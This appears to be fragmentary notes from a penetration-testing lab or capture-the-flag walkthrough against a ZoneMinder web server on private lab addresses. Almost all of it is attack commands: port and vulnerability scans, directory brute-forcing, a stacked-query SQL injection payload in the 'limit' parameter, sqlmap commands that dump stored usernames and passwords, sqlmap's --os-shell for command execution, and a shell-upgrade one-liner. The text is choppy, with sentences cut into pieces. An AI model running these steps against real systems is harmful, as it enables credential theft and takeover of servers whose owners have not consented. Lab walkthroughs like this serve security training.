nmapAutomator.sh -H 192.168.85.52 -t full
nmapAutomator.sh -H 192.168.85.52 -t vulns
gobuster dir -u http://192.168.85.52 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
gobuster dir -u http://192.168.85.52 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.php --threads 100
gobuster dir -u http://192.168.85.52:8080 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
hello.php
.limit
parameter is vulnerable to stacked queries. Using the following POST payload:view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5
sqlmap
.sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm --tables --threads 5
sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm -T Users -C Username,Password --dump --threads 5
--os-shell
option.sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
python -c 'import pty;pty.spawn("/bin/bash")'